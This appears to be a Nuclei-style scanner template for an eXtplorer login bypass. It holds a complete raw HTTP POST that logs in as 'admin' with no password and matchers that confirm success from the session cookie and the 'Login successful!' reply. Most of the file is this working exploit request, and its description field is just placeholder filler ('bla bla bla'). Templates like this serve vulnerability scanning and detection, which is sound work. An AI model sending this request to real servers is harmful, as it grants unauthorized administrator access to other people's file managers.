id: extplorer-login-bypass

info:
  name: eXtplorer login bypass
  author: otterly
  severity: critical
  description: bla bla bla
  classification:
    cvss-score: 10
  metadata:
    max-request: 1
  tags: login,login-byppas

http:
  - raw:
      - |
        POST {{Path}}/index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept: */*
        X-Requested-With: XMLHttpRequest
        Referer: {{Hostname}}
        Origin: {{Hostname}}

        option=com_extplorer&action=login&type=extplorer&username=admin&lang=english

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Set-Cookie: eXtplorer="
        part: header

      - type: word
        words:
          - "message':'Login successful!"
        part: body

      - type: status
        status:
          - 200
